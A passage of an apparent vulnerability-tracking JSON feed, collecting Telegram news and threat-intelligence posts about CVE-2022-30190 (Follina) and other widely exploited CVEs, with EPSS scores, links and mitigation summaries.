ProxyNotShell (CVE-2022-41082, CVE-2022-41040) \n\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352) \n\n9. Atlassian Confluence RCE flaw (CVE-2022-26134) \n\n10. Zyxel RCE vulnerability (CVE-2022-30525)\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u043e\u0441\u0442\u043e\u0440\u043e\u0436\u043d\u044b, \u0431\u0435\u0440\u0435\u0433\u0438\u0442\u0435 \u0441\u0435\u0431\u044f \u0438 \u0432\u0430\u0448\u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u044b.\nP.S. \u041d\u0438\u0436\u0435 \u0435\u0441\u0442\u044c \u043f\u0438\u043a\u0447\u0430 \u0441 \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u044b\u043c\u0438 \u0438\u043a\u043e\u043d\u043a\u0430\u043c\u0438\n\n#\u041f\u043e\u043b\u0435\u0437\u043d\u043e\u0435\n\n\u041f\u0430\u043a\u0435\u0442 \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438", "creation_timestamp": "2022-12-16T15:56:36.000000Z"}, {"uuid": "1ee52878-4384-4108-a270-fe5ef7bf490e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12590", "content": "Latest news and stories from BleepingComputer.com\nXFiles info-stealing malware adds support for Follina delivery\n\nThe XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers. [...]", "creation_timestamp": "2022-06-30T14:49:53.000000Z"}, {"uuid": "3c1cde3b-0369-456e-97a5-778c2b490edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/malwarehunters/524", "content": "\u2757\ufe0f\u0412 2022 \u0433. \u0442\u0440\u043e\u044f\u043d WoodyRAT \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u043b\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Microsoft Word \u0441 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-30190 \u00abFollina\u00bb, HTM-\u043b\u043e\u0430\u0434\u0435\u0440 \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0434\u043e\u043c\u0435\u043d \u0441 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0435\u0439 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e DNS \u0432 \u0437\u043e\u043d\u0435 .duckdns.org\n\n\ud83d\udccc \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 - \u0432 \u043c\u043e\u0435\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438\n\n\ud83d\udcca Dashboard \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043c\u0430\u043b\u0432\u0430\u0440\u0438 & \n\ud83d\udcd1 \u041e\u0442\u0447\u0435\u0442\u044b \u043f\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f\u043c\n\n\ud83d\udc26 \u0415\u0436\u0435\u0434\u043d\u0435\u0432\u043d\u044b\u0435 \u043e\u0442\u0447\u0435\u0442\u044b \u0432 Twitter\n\n\ud83d\udd11 #report #woodyrat", "creation_timestamp": "2022-10-13T08:18:14.000000Z"}, {"uuid": "06f58099-fc14-4ee5-82e3-ae15b1733243", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2478", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMitigation for CVE-2022-30190\nURL\uff1ahttps://github.com/k508/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-10T00:25:13.000000Z"}, {"uuid": "796a807e-345d-401c-a499-9d9987645d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/kasperskyb2b/786", "content": "\u2705 \u0413\u043b\u0430\u0432\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: \u043e\u0442\u0447\u0451\u0442 CISA \u0438 \u0438\u0445 \u0430\u043d\u0433\u043b\u043e\u044f\u0437\u044b\u0447\u043d\u044b\u0445 \u0441\u043e\u044e\u0437\u043d\u0438\u043a\u043e\u0432\n\n\u0412 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0433\u043e\u0434\u0430 \u0432\u044b\u0445\u043e\u0434\u044f\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u043e\u0442\u0447\u0451\u0442\u043e\u0432, \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0442 2022 \u0433\u043e\u0434, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u2014 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 12 \u043c\u0435\u0441\u044f\u0446\u0435\u0432, \u043d\u043e \u0432 \u043b\u044e\u0431\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043e\u043d\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u043e\u0443\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b \u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u043d\u044b. \u041d\u0430\u0447\u043d\u0451\u043c \u0441 \u0431\u043e\u043b\u044c\u0448\u043e\u0433\u043e \u043e\u0442\u0447\u0451\u0442\u0430 \u00ab\u043f\u044f\u0442\u0438\u0433\u043b\u0430\u0437\u044b\u0445\u00bb, \u043f\u043e\u0441\u0432\u044f\u0449\u0451\u043d\u043d\u043e\u0433\u043e \u0433\u043b\u0430\u0432\u043d\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \n\n\u0413\u043b\u0430\u0432\u043d\u044b\u0439 \u0432\u044b\u0432\u043e\u0434 \u043d\u0435 \u043d\u043e\u0432 \u2014 \u0441\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f 0day \u0438\u043b\u0438 1day. \u042d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0433\u043e\u0434 \u0438\u043b\u0438 \u0434\u0432\u0430, \u0438\u043c\u0435\u044e\u0449\u0438\u0435 PoC \u043d\u0430 Github, \u0434\u0430\u0432\u043d\u043e \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0435 \u043f\u0430\u0442\u0447\u0430\u043c\u0438, \u043d\u043e \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u043d\u0435 \u043b\u0438\u043a\u0432\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0442\u044b\u0441\u044f\u0447\u0430\u043c\u0438 \u0441\u0438\u0441\u0430\u0434\u043c\u0438\u043d\u043e\u0432 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.  \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043d\u0435 \u043d\u0440\u0430\u0432\u0438\u0442\u0441\u044f \u0442\u0440\u0443\u0434\u043d\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u043d\u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u0447\u0438\u0442\u0430\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445, \u0438\u043c\u0435\u044e\u0449\u0438\u0445 \u0432\u0441\u0435\u043c\u0438\u0440\u043d\u043e\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0432\u043e \u0432\u0441\u0435\u0445 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u044f\u0445.\n\n\u0422\u043e\u043f-12 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439: CVE-2018-13379 \u0432 Fortinet SSL VPN, \u0442\u0440\u0438 CVE 2021 \u0433\u043e\u0434\u0430, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0435 ProxyShell, CVE-2021-40539 \u0432 Zoho ManageEngine, CVE-2021-26084 \u0438 -26134 \u0432 Confluence, CVE-2021-44228 Log4Shell, CVE-2022-22954 \u0438 -22960 \u0432 VMWare, CVE-2022-1388 \u0432 F5 BIG-IP,  CVE-2022-30190 \u0432 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 \u0442\u0435\u0445\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 Windows, MSDT.\n\n\u0415\u0449\u0451 \u0442\u0440\u0438 \u0434\u0435\u0441\u044f\u0442\u043a\u0430 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u2014 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u043c \u043e\u0442\u0447\u0451\u0442\u0435 (\u0430\u043d\u0433\u043b). \u0422\u0430\u043c \u0436\u0435 \u0434\u0430\u043d\u044b \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c \u043f\u043e \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u0440\u0430\u0437\u0434\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u044b:\n\n\ud83d\udd18\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0435\u0439\n\ud83d\udd18\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439\n\ud83d\udd18\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u0430\u044f \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0430 \u0441\u0435\u0442\u0438\n\ud83d\udd18\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #\u0441\u043e\u0432\u0435\u0442\u044b @\u041f2\u0422", "creation_timestamp": "2023-08-07T10:20:52.000000Z"}, {"uuid": "36636268-e5eb-430d-a52f-f85f846f2422", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/76482", "content": "BSidesKC 2022 \u2013 Grant Shanklin\u2019s \u2018Trouble With The Troubleshooter; A Primer On CVE-2022-30190\u2019\n\nhttps://ift.tt/CemSbOE", "creation_timestamp": "2022-11-18T22:46:41.000000Z"}, {"uuid": "b47dabe1-b6fb-4d25-962f-5515b60d08aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/53234", "content": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction\n\nhttps://ift.tt/Wjha3VU", "creation_timestamp": "2022-06-06T10:26:35.000000Z"}, {"uuid": "da579da7-39b3-4c9e-8235-f410be24c2d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/53233", "content": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction\n\nhttps://ift.tt/Wjha3VU", "creation_timestamp": "2022-06-06T10:26:33.000000Z"}, {"uuid": "b57897e8-9c5d-490a-b73d-df79649096b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/Al5s1pu9DlCNMnH7rJt2q5NFKP_tt6i0TJLpRuR3HfdnDhA", "content": "", "creation_timestamp": "2022-12-05T04:24:48.000000Z"}, {"uuid": "7a010773-5369-4fb9-867e-ef40e4ad1f3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/52923", "content": "Malware \u2013 new OFFICE MSDT based attack CVE-2022-30190\n\nhttps://ift.tt/EP42lVq", "creation_timestamp": "2022-05-31T16:31:42.000000Z"}, {"uuid": "a8b5c22e-6431-4dfa-9b81-77846de69edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/754", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 314 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-29T14:42:00.000000Z"}, {"uuid": "846c29e0-b64a-4f63-bd37-45f15083ed5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/i9m6HRrazEdv2yYTfO5Vg9Qrfq03-5aNzHdOckuUq5U3HrY", "content": "", "creation_timestamp": "2023-07-17T14:40:27.000000Z"}, {"uuid": "a36b01df-bcd7-40d8-b5d3-cbf59ca39e50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/886", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 317 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-02T03:03:57.000000Z"}, {"uuid": "1cdd15ce-d096-4e5d-9fed-ad739ec8394c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/suSVZ8gjh9CeURgOUMEZq2Z7fyo2iknJlY7RsYX9Hr2cvtw", "content": "", "creation_timestamp": "2023-01-20T07:08:40.000000Z"}, {"uuid": "efea7d6f-7a5b-42f4-8ed5-5790f2d2daef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/1161", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 317 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-04T08:56:35.000000Z"}, {"uuid": "4fa9fc92-1642-468d-9448-62a0e14b761f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/177", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 308 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.971670000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-13T21:02:30.000000Z"}, {"uuid": "08e9c547-d5a9-4392-949e-6edfc61c4ab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/wireshark_hacking/771", "content": "Thorough MSDT 0-Day CVE-2022-30190 POC 'Follina'", "creation_timestamp": "2022-11-02T06:14:32.000000Z"}, {"uuid": "bcd6cfb0-950c-4773-8d10-0b1b937a03b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/637", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 315 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-28T12:29:25.000000Z"}, {"uuid": "2f68a12c-cd12-4a9c-bc70-018e615a7365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/Wo1sKu5WvLAnXgcdD3UnX1YZbL6JSQKu1r91lLadtAvpOaI", "content": "", "creation_timestamp": "2025-02-07T10:00:05.000000Z"}, {"uuid": "961cb6bf-2893-4117-87b5-15d528134838", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/VXX-UF1kIj_skcNHogz47Ob3F5rZG8tp8QVvD5iXH84fvqE", "content": "", "creation_timestamp": "2022-05-31T10:14:55.000000Z"}, {"uuid": "b70d1ebd-f7fb-4933-93ab-8bd938c3762f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/jjC-UMEvYm9WMdGwqx44S7y31oKWh_aFrkGisTJDTDGmWg", "content": "", "creation_timestamp": "2022-06-01T03:13:13.000000Z"}, {"uuid": "660e8fb1-e175-41d0-9fd8-e08b4415a060", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/PWf_vvG2Dns7xyv3p7orI9OcjbHcz0BpT-pBWPuIwftS1-g", "content": "", "creation_timestamp": "2025-03-02T16:00:09.000000Z"}, {"uuid": "b029f195-91fd-4226-9588-39bda60ed9e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/PFczZxou3M8bxtA_ogzzcgh7g-AmtdGPjCcJVMEUDXCS9Y4", "content": "", "creation_timestamp": "2025-04-08T17:00:08.000000Z"}, {"uuid": "f081c6a2-9db3-45d3-a3ee-e63238145c59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/BABATATASASA/5554", "content": "CVE-2022-30190 - Security Update Guide - Microsoft - Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", "creation_timestamp": "2023-10-05T19:33:27.000000Z"}, {"uuid": "a55b9f11-e98a-4b83-8161-b293201f634c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/nemeZ1da_ru/5466", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u043e\u0432\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb (Windows Search) \u2014 CVE-2022-30190. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u043e\u043a\u043d\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u0435\u0441\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c. \u0410 \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0435 \u043e\u043a\u043d\u043e, \u0436\u0435\u0440\u0442\u0432\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 Microsoft \u2014 MSDT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u044b. \u041d\u043e \u0435\u0441\u043b\u0438 \u043f\u043e\u0434\u0441\u0443\u043d\u0443\u0442\u044c \u0435\u043c\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office, \u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0441\u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URI-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00absearch-ms\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c \u0438 HTML-\u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0422\u0430\u043a\u0438\u0435 \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u043d\u043e \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442 \u0438\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438. \u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u0449\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041a\u0430\u043a \u044d\u0442\u043e \u0431\u0443\u0434\u0435\u0442 